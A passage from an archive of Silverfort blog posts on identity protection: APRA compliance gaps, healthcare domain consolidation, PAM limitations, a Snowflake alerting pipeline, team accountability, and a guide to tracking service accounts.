complemented with its identity protection implication and followed by an internal assessment question.   Additionally, we introduce Silverfort’s Unified Identity Protection platform, showing how it can enable APRA-regulated entities to resolve the identity protection element of these gaps to ensure they maintain the highest level of resilience to identity threats.   Gap No. 1: Identification and Classification of Information Assets – Identification of All User Accounts  Identity protection assessment question: Have I identified all internal and external user accounts that have access to critical information resources?   Why does it matter?   In the context of identity protection, user accounts are the attack surface that must be guarded. Because if adversaries manage to compromise these credentials, they can then easily access resources and cause heavy damage. Thus the most fundamental task is to ensure that each user account is known and monitored. This includes standard and administrative users, but also machine-to-machine service accounts as well as any third-party contactors that have access to the entity’s environment.   Gap No. 2: Information Security Controls of Third Parties - Enforcement of Secure Authentication  Identity protection assessment question: Do I have strong secure authentication in place for third-party contractors that have access to my internal resources?   Why does it matter?   Adversaries target third-party supply chains because they (rightfully) assume this to be the weakest link in an organization’s protection stack. The identity protection aspect here relates to the organization’s ability to enforce secure authentication on its supply chain ecosystem and ensure it can validate that the user requesting access is indeed the contractor itself and not an adversary who has managed to compromise the contractor’s credentials.   Gap No. 3: Control Testing Programs Including Lateral Movement in Red Team Assessments  Identity protection assessment question: Do I have resilience-testing programs in my environment (i. e. , Red Team) that include using compromised credentials to access resources?   Why does it matter?   During a cyberattack, the phase where an adversary begins to move laterally in the environment is the X factor that transforms a local event into an organization-level incident. If the purpose of the attack is ransomware, then the difference is being able to encrypt multiple machines rather than just a single one. If it’s data theft, lateral movement is where the attacker manages to make their way from the “patient zero” machine to a targeted resource where sensitive data resides. This makes incorporating this part of resilience testing critically important.   Gap No. 4: Incident Response Plans – Comprehensive Insight into User Authentication Trails  Identity protection assessment question: Does my forensic visibility stack include the ability to easily view and analyze all users’ authentications and access attempts to be able to track an adversary’s path across my environment?   Why does it matter?   The core part of a response process is being able to trace the full path of attacks, from initial access to target actions, so that every instance of malicious activity and presence can be identified and removed. On the identity side of this investigation, it’s the ability to see the movement of user accounts across machines, identify the exact point where they were compromised, and spot the malicious techniques involved in the attack. This cannot be achieved unless there’s a central hub where all authentications and access attempts are aggregated.   Gap No. 5: Internal Audit Reviews of Information Security Controls – Actual Coverage Provided by MFA and PAM  Identity protection assessment question: Do my internal security audits involve checking the scope of identity protection measures (e. g. MFA, PAM, risk-based authentication, etc. ) including coverage and actual use?   Why does it matter?   At the end of the day, the security controls in place make the difference between a failed attack attempt and a successful breach. Moreover, it’s not enough to just have security solutions in place but also ensure their level of coverage and correct use. For example, MFA that is enforced on admins only leaves regular domain users exposed. As well, MFA that, in theory, applies to all users but is not fully in use because of workforce objections reveals a similar gap. Furthermore, MFA protection on RDP access without similar coverage for command-line access is also not enough. Identity protection controls can only achieve real-time protection if they are deployed in a comprehensive manner and cover an entire workforce and all resources.   Gap No. 6: Notification of Material Incidents and Control Weaknesses - Identity Threat Detection Identity protection assessment question: Can I easily identify and scope identity protection weaknesses and incidents in my environments?   Why does it matter?   Detection of an active identity-based attack can be a complicated challenge. Unlike malware, which leaves distinct forensic artifacts on compromised endpoints, identity threats are just a sequence of authentications. Moreover, determining that an account was compromised means an immediate reset or even the disabling of that account, making false positive a high concern.   The Silverfort Platform: Real-time Protection Against Identity Threats  Silverfort has pioneered the first purpose-built Unified Identity Protection platform that can extend MFA to any user and resource, automate the discovery, monitoring, and protection of service accounts, and proactively prevent lateral movement and ransomware spread attacks. Silverfort connects to all domain controllers and other on-prem identity providers (IdPs) in the environment for continuous monitoring, risk analysis, and access policy enforcement on every authentication and access attempt made by users, admins, or service accounts to any user, system, and environment.   Resolve Every APRA-Detected gap with Silverfort  In the context of APRA’s detected gaps, Silverfort enables identity and security teams to address all of them. Silverfort’s integration with all IdPs in the environment provides 100% visibility into every user authentications and access attempt. Its agentless architecture makes it easy to enforce MFA on third-party access and its MFA can cover all resources and access methods (including legacy apps and command-line access) as well as privileged account protection — providing the highest resilience against malicious use of compromised credentials. Silverfort’s risk engine is purpose built to detect identity threats, from Brute Force to Pass-the-Hash and other techniques, and its detailed authentication logs provide clear insight into all users’ authentication and access attempts.   Want to increase your resilience to identity threats and align with APRA’s best practices? Schedule a call with one of our experts.   --- - Published: 2023-07-03 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-silverfort-helps-healthcare-providers-gain-visibility-into-their-consolidated-environments/ In recent years, the healthcare industry has witnessed a notable surge in consolidation, with numerous hospitals, clinics, and healthcare providers joining forces to form larger entities. This consolidation wave brings various benefits such as improved coordination, economies of scale, and streamlined operations. However, amid this transformation, the visibility gaps into healthcare services’ users and resources emerge as a crucial aspect that demands more attention. In this article, we’ll explain how Silverfort empowers healthcare organizations to quickly deploy their new environments while gaining complete visibility into the incoming users and resources. The Security Risks that Healthcare Consolidation Introduce As healthcare organizations acquire other healthcare services, they consolidate the newly acquired patient information, business operations, and IT environments. As part of this consolidation, IT teams need to merge the different technologies and resources as they become increasingly interconnected. The newly integrated environment brings different IT systems, networks, and user accounts into a unified infrastructure. This can result in a complex environment in which administrators may struggle to comprehensively understand all the resources, applications, and users in the consolidated entity. In the typical case of healthcare organization consolidation, the new consolidated entity needs to understand how they can combine all domains, and move all resources to one unified IT infrastructure. This means understanding the type of accounts and resources you need to migrate. For example, which accounts are service accounts, and what kind of applications you need to merge. In most cases, the IT team won’t know much about the environment or the users they are receiving. This creates a major blind spot in which organizations don’t know the details of the incoming environment and what they are getting. From a security perspective, the key challenge is the lack of complete visibility across the new environment, the different resources, and the users that come with it. This lack of proper visibility can potentially bring more security risks to their environment. Silverfort’s Domain Consolidation Protection  Silverfort enables healthcare organizations to easily migrate new environments, and onboard resources and users to the main entity domain, which helps allows the newly merged environment to become operational faster. In addition, by migrating all resources and users, Silverfort can enable healthcare organizations to gain better visibility into their environments, allowing them to protect not the environment that you're acquiring, but their own environment to ensure they understand the risks involved in onboarding the new environment. By enforcing new security measures with Silverfort, organizations are becoming more proactive against incoming cyber threats such as lateral movement attacks. Now, let’s show how you can gain visibility into all the resources and users in the Silverfort console. Adding New Domains to Silverfort In the Silverfort system settings, choose Silverfort Nodes. Here you will add your node connecting Silverfort to the virtual machine you put in the new environment. This will allow Silverfort to gather information about the new environment's resources, users, and insights. Screenshot #1: Adding nodes to Silverfort in the system settings screen Multi-Domain Support Recently, we added a multi-domain support capability. This allows organizations to use one node for all their domain environments. A single node will provide Silverfort with all the information about each environment. Screenshot #2: Silverfort's multi-domain screen Visibility and Monitoring of Service Accounts Silverfort automatically identifies Service Accounts in your environment. This is because, as machine accounts, service accounts display predictable behavior patterns, allowing Silverfort to identify and categorize them automatically In the Service Accounts screen, these accounts are shown. Silverfort categorizes all detected service accounts into three main types: Machine to Machine (M2M) Accounts, Hybrid Accounts, and Scanners. Once all the migrated service accounts are detected, you can monitor service account activity and associated risks. Silverfort provides real-time insights and visibility into all service account details and behavior, and constantly monitors and audits their use. Screenshot #3: Silverfort’s investigation screen shows insights into a specific service account’s activity By continuously monitoring all authentication and access activity of the migrated service accounts, Silverfort can assess the risk of every authentication attempt and detect any suspicious behaviors or anomalies. Next, the final step of consolidating environments is full visibility into user authentication activity. Visibility of User Activity & Authentications In the Logs screen in the Silverfort console, organizations will have complete visibility into all their user logs and authentication activity. From the consolidation perspective, in this screen, organizations will understand who all the incoming users are, what they are trying to access, and what their risk score is. Screenshot #5: Silverfort’s logs screen By clicking on the investigate icon next to a user in the Logs screen, you can see details of the user’s logs, authentication activity, risk indicators, and more actionable insights about the user's activity. With these details of the user’s activities, organizations are equipped with all the information needed to have complete visibility into each user and their authentication activity. Screenshot #7: Silverfort's user investigation screen With complete visibility into the migrated resources, service accounts, and users, healthcare organizations can sleep at night knowing that they have a complete picture of their consolidated environment. Real-Time Visibility is the Answer for a Secure Consolidated Environment Silverfort’s capabilities to increase the visibility into all resources and users in consolidated environments will help healthcare organizations become more operational and secure within a few days after migrating the newly acquired environment. The consolidation of environments' main goal is about simplifying and optimizing all their resources and users into one environment. By implementing this approach, a key complement is having complete visibility across the environment. By applying continuous monitoring and risk analysis with every migrated resource, service account, and user, Silverfort empowers healthcare organizations to be equipped with detailed insights into every authentication and access attempt while providing real-time protection for their entire consolidated environment. --- - Published: 2023-06-21 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/how-silverfort-solves-the-toughest-challenges-of-privileged-access-management-pam/ The standard way of addressing security issues that stem from an organization’s privileged user accounts is with a privileged access management (PAM) solution, which can be a very effective tool against threats that target admin credentials. However, when it comes to fully implementing PAM there are often significant challenges around onboarding, operating, and maintaining the solution that can prevent the product from reaching its full potential. In this blog post, we will discuss the top five issues faced by identity teams when undertaking a PAM implementation project, and suggest ways that each of these issues can be addressed with a Unified Identity Protection platform. Challenge #1: Undetected Service Accounts and Shadow Admins It may seem obvious but before PAM protection can be placed on an admin account, the PAM administrator must first know about that account’s existence. In reality, however, this is much easier said than done. The reason is because of two types of accounts that present a serious challenge in terms of being easily discovered: Service Accounts – These machine-to-machine accounts often have privileged access so that they can carry out critical tasks in a network without the need for human interaction. The problem is that these accounts are often created without proper documentation, making them unknown to identity teams working on a PAM project. Furthermore, there is no utility that can filter out all service account activity within an Active Directory (AD) environment — essentially rendering these accounts invisible and thus not onboarded to the PAM solution. Shadow Admins – Sometimes standard users can inadvertently be assigned high access privileges without the identity team being aware of this. A common example is a user account that is not a member of a privileged admin AD group yet has the privilege of resetting the password of an admin. But because the user account has not been identified as privileged it also won’t be included in PAM. Challenge #2: Service Accounts With Unmapped Dependencies The cornerstone of a PAM solution is its vault, where the credentials for all privileged accounts are stored, and a key protection that PAM provides is the ability to regularly rotate the passwords of all accounts stored within the vault. This hampers an attacker’s ability to use any compromised credentials they may have acquired by limiting the time during which those credentials are valid. The problem with password rotation, however, is that it cannot effectively be applied to service accounts that have high privileges. The reason is because these accounts often access their targeted machines by executing a script where their login credentials are stored. However, there is no way to automatically update the password within this script using PAM (nor can this be done manually since the exact location of the script itself is usually unknown). The upshot is that rotating the passwords of these service accounts using PAM would actually invalidate the password in the script, which would then prevent the account from performing its intended task. This, in turn, could lead to a cascade of problems across the network as any critical processes dependent on the service account completing its task would fail as well. Due to this risk, identity teams often refrain from onboarding highly privileged service accounts to PAM, thus leaving them exposed to compromise. Challenge #3: Admins That Bypass PAM As the saying goes, a chain is only as strong as its weakest link and this applies to a PAM solution as well. Because PAM products are robust and sophisticated tools – built to protect admin accounts from compromise with measures such as password rotation, the use of vaults, and session recording – the resulting login experience for admins can ultimately be more cumbersome. The problem is that because of this, admins will sometimes choose to bypass PAM altogether in the interest of efficiency — using the PAM solution only to extract their new password and then logging in directly to the various servers and workstations they need to access. This practice, of course, completely voids the very protection that PAM was intended to provide, exposing a critical security gap. Challenge #4: Protecting Access to PAM Itself As powerful a solution as PAM is, it does have an Achilles’ heel: it cannot protect itself. This means, of course, that if an adversary were able to compromise the credentials of the PAM they would then have access to the credentials of all privileged accounts stored in its vault and therefore any resource in the environment — a potentially catastrophic scenario for any organization. The attack surface for malicious access becomes particularly evident when considering that there are multiple ways to access a PAM solution: via web portal: used for credential retrieval as well as administrative tasks via proxy access: used by network admins to connect to various systems using vaulted credentials via API: used for automated tasks and by service accounts With so many different ways to access PAM, this means that any single point of exposure – for example, a service account whose credentials have been compromised – could in turn lead to a compromise of the entire PAM system itself. Challenge #5: Accounts That Can’t Be Vaulted Immediately (Or Ever) Fully rolling out a comprehensive PAM solution can be a massive undertaking, a project that often takes months or sometimes even years to complete. And during this process, any privileged accounts yet to be onboarded to the PAM product remain exposed to compromise. As well, since service accounts often have dependencies that are extremely difficult to map, these privileged accounts can remain outside of PAM protection indefinitely, due to the issue mentioned previously around the concerns of breaking any critical processes of these accounts with password rotation. This means these privileged accounts would remain exposed as well. How Unified Identity Protection Can Complement PAM Unified Identity Protection is a new category of security products, built to provide real-time protection of the identity attack surface through continuous monitoring, risk analysis, and the enforcement of access policies. By integrating directly with all identity providers, the platform is able to get full visibility into every incoming authentication and access request within the environment, whether on-prem or in the cloud. This is means that a Unified Identity Protection platform can solve the challenges of PAM through three core capabilities: Account Discovery –By having complete visibility into all authentications, the platform can analyze every account, including its privileges and specific behavior — easily discovering all service accounts (since these display highly predictable behavior) as well as uncovering any shadow admins (through examining the access-control lists provided by AD). Multifactor Authentication (MFA) Policy Enforcement –The platform can also apply MFA policies to privileged accounts in order to secure all access in real time. This means that admin accounts would only be able to access resources when the source of the destination is the PAM itself (and furthermore could also require MFA on this very connection). Service Account Protection – By continuously analyzing the activity of every service account in the environment, access policies would be triggered whenever a service account (whether unvaulted or not) deviates from its standard behavior, thus extending full protection to every privileged account in the environment. Accelerate Your PAM Journey with Silverfort Silverfort’s Unified Identity Protection platform protects enterprises against any identity-based attack that uses compromised credentials, allowing identity teams to get more from their PAM investment by solving its inherent security challenges. Specifically, Silverfort can help with PAM onboarding by automatically discovering all service accounts and shadow admins as well as mapping all dependencies of service accounts. As well, Silverfort can better protect access to the PAM itself by enforcing PAM-only access on admins as well as requiring MFA. Silverfort can also complement PAM protection by securing service accounts through the configuration of access policies and by protecting any admin accounts that happen to reside outside of the PAM. Ready to learn more about how Silverfort can empower your PAM solution? Read more about this here. --- - Published: 2023-06-20 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/building-an-alert-system-using-snowflake/ During my time here at Silverfort, I was tasked with building an alert system to send messages from our Snowflake database directly to a Slack channel. Easy enough, I thought to myself. But the project expanded quickly and has now evolved into a critical component we use daily to monitor and mitigate threats. In this post, I want to share my journey with you (which started shortly after we transitioned from Redshift to Snowflake), the challenges I faced building this system, and how I was able to overcome them.   The Goal of an Alert System - Helping the Threat-Hunting Team Create Better Value for Customers Silverfort detects and alerts on breaches to customers by analyzing authentication traffic and information from the environment. Every detection is represented by an Indicator of Compromise (IOC), which can alert us to a variety of things, from simple misconfigurations all the way to potential malicious attacks. While all this information is readily available in the product, customers may not always understand the meaning behind each IOC. Furthermore, new vulnerabilities and attack methods are constantly being discovered, and this can take time to be fully integrated into the product. For these reasons, we wanted to create an alert system that would help us easily add new IOC implementations to enable quick and effective investigations into security events. First Iteration and the Problems it Raised Snowflake & SnowAlerts Once we transitioned to using Snowflake as our database for research and analytics work, using it to send alerts about noteworthy security events to a Slack channel seemed like a no-brainer. Snowflake already has an open-source component called SnowAlert, developed by the Snowflake team for this exact purpose. Although more streamlined solutions are available as third-party services, because the data in question is sensitive we didn’t want to expose it to any external sources unless necessary. So running this SnowAlert component on a Docker running on an internal machine was a good solution. (If you want to learn more about the SnowAlert component, a helpful tutorial can be found here: SnowAlert to Slack. ) To send alerts from Snowflake using SnowAlert, these must be placed in a Snowflake View. The view is a saved subquery over a table or another view, which is given a name and can be called in the FROM clause of an SQL query, just like reading from a regular table. You can use views on top of other views, which is a feature I used a lot in building the current iteration of the alert system. In order for the SnowAlert module to know where to send the desired alerts, the view must be defined with a handler that specifies the template for the message sent, the type of channel (e. g. Slack, email), and the target (e. g. email address, Slack channel, Slack direct message). An example of defining two handlers on a view, one to a Slack channel and one to a specific email address. First Implementation  When I was first tasked with building this alert system, we had six different IOCs in mind. All of these could be retrieved from the same Snowflake table and all had a simple logic for detection. I decided to retrieve all the alerts using one query that would scan the table once for the requested dates. This was done by creating a view of the table to retrieve the alerts and another version of that view to transform it into the format the SnowAlert component required. This worked great for a while...   Problems Faced and What Needed to Change  Once activated, the alert system proved itself over and over by detecting attacks and noteworthy events in our customers' environments. Building on this success, more IOC detections with varying levels of complexity were added to this system. We wanted some alerts to be triggered only when certain conditions were met. But some needed to be combined with data from other tables and sources, so join and aggregation operations were needed. This was quickly becoming a monster, and doing all of this in a single view (basically one SQL query) began to become problematic. Here are some of the problems we faced: As alerts were being added, performing the operations needed on every row all at once was becoming taxing and slow. And the amount of time needed to complete the operation was starting to skyrocket.   Debugging this giant block of SQL code was a nightmare, and changing and updating it was becoming difficult and prone to errors.   As requests for more IOCs came in, it became clear that a major change in architecture was required.  The current architecture: Thus we arrived at the current solution, which uses a series of multiple views that are executed sequentially and in parallel. The high-level idea behind this architecture is that we first split it into two parts: The ETL and alert collection part (shown on the left side): Retrieving alerts from data sources using pipelines Pipelines should be composed of queries of a similar nature (i. e. shared data source and data operations) At the end of each pipeline, we ensure that the data is in “standard form” and contains the same structure Uniting the data from all pipelines and saving it into the memory table Alert filtering and allocating alerts to channels: We retrieve the relevant alert data and perform filters as necessary (e. g. filtering out old alerts based on time) Aggregation of alerts per message Sending the results of the aggregations to the relevant views with a handler to the necessary channel Note: While the diagram above shows only a single flow to a single channel, you can actually create many such flows to multiple channels. The breaking up of the process into two parts with a table in the middle makes this much easier to debug and track. It also makes it possible to run the two parts at different times or frequencies. Overall, the architecture is the result of all the pain points we experienced during the previous iteration after observing how the alert system was being used and the future-proofing it needed. Except for the Data Sources and the Alerts Memory Table (which is a Snowflake Table), every other object in the architecture is a Snowflake view. Why This Solves Numerous Problems Why does this more complex architecture help? Because it upholds several key concepts: Encapsulation Creating a series of views means that we can run and debug every section independently. This saves time when debugging but also makes things cleaner and easier to update. It’s a concept that works well in object-oriented programming languages and it applies here as well. Standardization While you can make the logic as complex as you want, the data at the end of all pipelines must contain the exact same structure. This makes it possible to join various pipelines using different levels of complex logic into one coherent pipeline. Parallelization Using a combination of sequential and parallel views (which are all subqueries), we gain the benefit of parallelization. Since the different pipelines are completely independent until the union between them is performed, Snowflake can run each pipeline as a sequence of parallel subqueries. By making each pipeline composed of alerts that need the same type of operations (e. g. aggregation by user), we can perform multiple detections in the same pass over the data — just like in the previous implementation but more focused). This helps improve performance. Automation Using a combination of scheduled tasks, UDFs, and procedures that are integrated into the Snowflake database, we can automate the entire process to detect changes and adapt. New alerts added to the process in the pipelines are detected in the upper levels, so no updates are required beyond the pipeline level. Process Independence Adding alerts does not require changing views outside of those alerts’ pipelines. And adding more channels or changing filters or aggregations for alerts does not require changes to the pipelines either. How This Is Implemented in Snowflake Encapsulation & Parallelization These are implemented by using multiple pipelines of sequential views, specifically breaking down each pipeline into multiple views with each view representing a logical step in the pipeline. The union of all these pipelines is another view, and calling from that view will make Snowflake execute all the underlying pipelines as subqueries in parallel. Process Independence This is attained first by making the Alerts Memory Table an actual table and not a view. It collects alerts over time that we can use to see statistics. Most importantly, making it a table means it is stored, which in turn means we can build multiple processes on top of it (e. g. for multiple channels requiring various levels of aggregations and/or filtering). Standardization Each pipeline must end with the data having a standard structure. This ensures that we have a single alert type per customer and date in each row, which makes adding more alert types straightforward since we don’t have to change the schema and add additional columns; we can simply add more rows that contain the information about the new alerts but with the same schema as previous alerts. Also, since all pipelines must abide by this standard, they can be unified by simply using a UNION ALL between them. To get to this form in each pipeline, we first aggregate the data to get a column for each alert. Then we apply an UNPIVOT to the view to get it to its standard form. Automation Since we don’t want to worry about having to update schemas or ensuring new alerts are propagating upwards, we automate the process to detect new alerts. This is done via the unpivot process, which converts the alerts from columns to rows. Because dynamic unpivot (over a dynamic set of columns) is not natively supported in SQL, I used Snowflake’s procedure and scheduled tasks to apply this automation.  The procedure unpivots a view on the list of alert columns and creates the unpivot view. The scheduled task calls the creation of the procedure for every view needing the unpivot to detect if a new alert has been added. Thus new alerts added are turned into rows automatically. A procedure to dynamically unpivot from a view to a new view  How Everything Is Performing I am happy to report that, thus far, there have been vast improvements — not only in performance (which seems to be more than 10X faster using the same computing power) and lower running costs but also because using the system is more comfortable. Since the launch of this new iteration, I have added new alerts with much more complex logic. So far, this has been a much better experience in terms of faster debugging and testing as well as implementing changes. Adding a new alert is now a matter of writing a simple SQL query and making sure the pipeline updates at key places. Everything can be done – including testing – in less than half an hour. As for the rest, I no longer have to worry about it. --- - Published: 2023-06-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/mind-the-gap-whos-accountable-to-protect-against-identity-threats-in-your-organization/ Identity threats (i. e. , the use of compromised credentials for malicious access to targeted resources) have become the dominant element of today’s threat landscape. Moreover, these are the threats that organizations find the hardest to protect against, with lateral movement and ransomware spread causing widespread damage on a seemingly daily basis. Yet, within most organizations there is in fact a gap in terms of who is actually accountable to prevent these attacks. And this gap is one the fundamental reasons that organizations struggle to gain the upper hand against identity threats. In this post, we’ll discuss this gap by examining a sample use case, with the purpose of prompting all cybersecurity professionals to reflect on how present this gap is in their organization and how it can be resolved. Identity Teams are Not Accountable for Preventing Cyberattacks Meet Jack. Jack is an Identity and Access Management (IAM) engineer at his company. Part of Jack’s role is to implement multifactor authenticaton (MFA) protection on his users’ access. Being a consummate professional, Jack evaluates, purchases, and deploys an MFA solution on all of his company’s SaaS and web apps, well as for remote VPN access to the on-prem environment and Remote Desktop Protocol (RDP) access within it. But because MFA for RDP entails installing an agent on each server in the environment, the decision is made not to deploy this on a specific group of older servers that support several business-critical apps. The concern here is that the additional load of the MFA agents will crash these servers, leading to unacceptable downtime. So the project is considered successful given these considerations. Security Teams are Not Accountable for Evaluating and Deploying Identity Protection Products Now meet Jill, who is a Security Operations Center (SOC) manager on her company’s security team. Her KPI is to prevent, detect, and respond to cyberattacks. Jill is aware that ransomware attacks which spread across the enterprise environment are a critical threat. Adversaries accomplish this spread by using compromised user credentials to log in to as many machines as possible. To prevent this, Jill’s team invests significant effort in responding to alerts and proactively hunt for anomalous user access that could indicate such a spread is taking place. However, neither Jill nor anyone from her team have been involved in the evaluation, testing, and rollout of the MFA solution that is now in place across their enterprise’s environment. Because her focus is squarely on cyberattacks, her only reaction is being happy to hear that the MFA project was successfully completed. The Result: Cyberattacks That Include Identity Threats Encounter Little Defense One day ransomware hits. The adversaries realize the organization’s app servers are the best target to hold hostage. To gain control of these servers and encrypt the data on them, they attempt to log in via RDP using a compromised user’s credentials. And since there’s no MFA on these servers, the attempt is successful. Now the adversaries are in full control and can impose their ransomware demands on the organization. Let’s leave our story and reflect on what happened here. Lessons Learned: When No One Owns The Risk, The Risk Owns You So what made this breach possible, despite there being dedicated and talented identity and security teams in place? The answer is in how Jack and Jill perceive the role they’ve been assigned in their organization. For his part, Jack was not tasked with preventing ransomware spread but rather with deploying an MFA solution. From his perspective, the servers without MFA protection weren’t seen as a security risk but instead as a missing percentage in the project’s overall MFA coverage rate. And a coverage rate of 90% is significantly better than the previous rate of 0%. Best efforts were made and, while results weren’t perfect, they were definitely good enough. Jill, on the other hand, had no part whatsoever in the MFA project. Unlike a SIEM or an EDR, MFA is not considered a security product but rather a focus of the identity team. Had Jill been involved in the MFA discussions, she might have discovered that the app servers were exposed and pushed to upgrade them so that the MFA project would not be considered complete before these servers were fully protected. So is Jack to blame for the breach? Not really, because this was never part of his responsibility. Does that mean Jill is to blame for the partial MFA coverage? Not really, because MFA has never been part of her jurisdiction. And this is exactly the accountability gap we’re talking about. Could an Accountability Gap Exist in Your Environment? This story is a good example of the state of identity protection today. How this accountability gap developed and why it is found only within identity protection (unlike endpoint or network protection) is worth a separate discussion. What’s more important is for you to ask if a similar scenario could take place in your environment. Here are some key questions to ask yourself: Is your SecOps teams involved in implementing identity protection controls such as MFA and PAM? Does your CISO have a say in the design and implementation of the IAM infrastructure? Does your identity team realize that the solutions they evaluate and deploy are actually the last line of defense against attacks that could put the entire organizations at risk? And the most important question: Is there a single stakeholder in your organization who has both the accountability to prevent identity threats as well as the authority and knowledge to determine the security measures that should be put in place to achieve this? This is not to say that identity protection will be complete after resolving the accountability gap. Certainly, there are other challenges to overcome before getting there. But it is an essential first step to take in order to make this protection possible. Ultimately, whether the accountable person comes from the identity side or the security teams doesn’t matter. As long as there is a clear owner in your organization, the initial milestone of getting the upper hand over identity threats will be accomplished. --- - Published: 2023-06-07 - Modified: 2024-03-13 - URL: https://www.silverfort.com/blog/guide-to-tracking-service-account-usage/ Service accounts are powerful tools that perform important automated functions within IT systems, but they can also pose significant risks if they become compromised. Monitoring service account usage is critical to maintaining security and compliance, but many organizations struggle with gaining full visibility into exactly how many of these accounts they have, not to mention how they’re actually being leveraged across the environment. This is why uncovering the trails of service account activity requires a methodical approach across all systems, logs, and accounts. In this guide, we will explore how to thoroughly track service account usage across your organization using a layered monitoring methodology. With the right solution and techniques, your organization can uncover the trails of service account activity and ensure they are not leading to potentially breaches and ransomware attacks. How to Find Where a Service Account is Being Used Step 1: Review Active Directory for Existing Service Accounts To uncover where service accounts are being used in your environment, the first step is to review Active Directory (AD) for existing service accounts. Service accounts are used by applications and services to access resources, so identifying them can provide insight into which systems may be accessing what data. Within Active Directory’s Users and Computers, you can filter user accounts to only show service accounts. Service accounts typically follow a naming convention like “SVC_” or “SERVICE_” to differentiate them from standard user accounts. Review each service account to determine: What application or service it is used by. The name or description field may provide details on what system uses the account. What privileges it has been granted. Service accounts are often given elevated rights to access resources, so understanding the level of access is important. When the password was last changed. Service account passwords should be complex and rotated regularly according to your organization’s policy. If the account is still actively being used. Disable any unused service accounts to reduce the attack surface. If the account requires additional monitoring or security controls. Privileged service accounts may necessitate extra safeguards, such as the creation of access control policies. Once you have cataloged any existing service accounts in your Active Directory, you can compare them against your organization’s list of approved applications and services. Look for any unauthorized or unrecognized service accounts, as these could indicate compromised credentials or a malicious insider threat. Remove or disable them immediately. For authorized service accounts, enable logging and monitoring to track their activity and usage over time. Look for solutions that can provide the real-time monitoring of service accounts, detecting anomalies in behavior that could signal account compromise or misuse. Continuously analyzing service account activity is critical for understanding where these accounts are being used in your environment and ensuring they remain secure at all times. For more on this, check our comprehensive guide on how to find service accounts in Active Directory. Step 2: Check for Service Accounts in Entra ID To uncover where service accounts are being used in Microsoft Entra ID, log in to the portal and navigate to the ID section, then under Manage select Enterprise applications. This will display a list of all applications in the tenant. Look for applications with “service account” in the name. These are the accounts created by Entra services to access resources. Select an application and click Properties to view details like app ID, sign-on URL, and group membership. The group membership will show which Entra resources the service account has access to. Some common Entra service accounts to look for include: Entra ID Service Account: Used by Entra ID to access resources Entra DNS Service Account: Used by Entra DNS to access DNS zones Entra Policy Service Account: Used by Entra Policy to access resources for compliance evaluation Log Analytics Service Account: Used by Log Analytics to access resources for monitoring To discover the permissions of a service account, check its role assignments. This can uncover whether the account has unnecessarily high levels of access. Select the service account and click Role assignments under Manage. This will list the roles assigned to the service account and the resources/scopes it has access to. Look for any roles granting admin-level access, like Owner or Contributor on high-value resources. If found, these roles should immediately be reduced to least privilege. Some key points to consider when reviewing service accounts: Only Entra services should create service accounts. Any service accounts created manually should be investigated. Service accounts should have only the minimal access needed to perform their intended functions. Broad access increases the risk of compromised accounts. Monitor service account login activity for signs of suspicious access. Entra ID Premium provides tools to detect risky logins. Implement strong security controls like digital fencing, conditional access, and privileged identity management to help secure service accounts. In summary, regularly reviewing service accounts and their access permissions is a key to reducing the threat of compromised accounts. Tightly controlling service accounts helps ensure secure and compliant access to resources. Step 3: Scan Your IT Infrastructure for Service Account Usage To uncover where your service accounts are being used across your IT infrastructure, you'll need to thoroughly scan each system. This involves using both automated scanning tools as well as conducting manual inspections of critical systems. Review Account Permissions Review the permissions assigned to each service account on all systems. Look for accounts with broad and unnecessary access that could facilitate lateral movement if compromised. Prune permissions and roles so that each account has only the least amount of access needed in order to conduct its activities properly. Check for Embedded Passwords Scan all scripts, configuration files, and code repositories for any embedded service account credentials. These hardcoded passwords can pose a serious security risk if they are uncovered by malicious actors. So be sure to remove any embedded passwords that are found and store all credentials in a secure secrets-management solution instead. Inspect for Account Misuse Closely inspect systems and applications that integrate with your service accounts for any signs of misuse or compromise. Look for anomalous logins, file executions or changes, or other suspicious account activity that could indicate a potential breach. Revoke access immediately if any unauthorized access is detected. Deploy Monitoring Tools Use monitoring tools to gain full visibility into service account behavior and detect threats. It’s important to build a baseline of normal activity for each account so that you can then detect any deviations that could signal compromise or misuse, enabling a rapid response. Repeat Scans Regularly Conducting regular scans of your IT infrastructure is one key to managing service account security risks. Repeat the steps outlined above on a continuous basis to uncover any new issues as they emerge. Schedule scans to run automatically on a weekly or monthly basis in order to get the most comprehensive insight into your service account landscape. Staying on top of service account usage with frequent scanning and monitoring is essential in order to reduce the risks associated with highly privileged accounts. Although time consuming, these proactive steps can help prevent a serious breach resulting in the case of a compromised service account. Continuous visibility and review will give you assurance that this critical aspect of your infrastructure security is being properly managed. Step 4: Review Configuration Files on Servers and Applications Reviewing configuration files on servers and applications is an additional important step in tracking service account usage. These files contain details on how service accounts are configured and the specific permissions they’ve been granted. To review configuration files, you need to log into all servers and applications that service accounts have access to. Look for files with names like “config. xml,” “app. config,” or “web. config. ” In Linux and Unix systems, also check “/etc/passwd,” “/etc/group,” and “/etc/shadow” files. Once you locate these configuration files, review them for any mentions of service account names. For example, look for sections on: Authentication: See what credentials and permissions service accounts are using to log in. The files may specify the account names, passwords, and login methods. Authorization: Check what level of access each service account has — like read, write, or admin permissions. The configuration files will list the specific resources, files, and data that the accounts can modify or view. Roles and Responsibilities: Some files may outline the intended usage and responsibilities of your service accounts. See if the current configuration aligns with the documented usage. Be sure to look for any deviations that could indicate malicious activity or account misuse. Dependencies: The configuration files may indicate other systems, applications, or resources that the service accounts rely on or integrate with. These dependencies can provide more areas to investigate for traces of the service accounts. Reviewing server and application configuration files provides valuable insight into how service accounts are set up and used in the environment. Comparing the configuration details with actual account activity and usage can uncover irregularities that point to compromised or misused accounts. The best solutions can automate the discovery and analysis of service accounts across systems to streamline this tracing process. Step 5: Leverage a Service Account Management Solution A service account management solution offers the ideal way to gain visibility into and control over service account usage. These purpose-built tools are designed specifically for managing service accounts at scale. They provide a centralized place to discover all service accounts across an environment, monitor them for anomalies, and put strong access controls in place. Comprehensive Discovery A service account management solution should employ advanced discovery techniques to uncover all service accounts, including those that may be “orphaned” or improperly configured. It scans domains, databases, applications, and more to build a complete inventory of accounts. This full visibility is essential for closing security gaps and reducing risk. Continuous Monitoring Once all service accounts have been discovered, the solution should be able to monitor them constantly for any unusual activity that could indicate their compromise. It should establish a baseline of normal behavior for each account and then be able send alerts if there are any deviations from the norm or even block access altogether. This 24/7 monitoring should work across all accounts and systems in order to detect 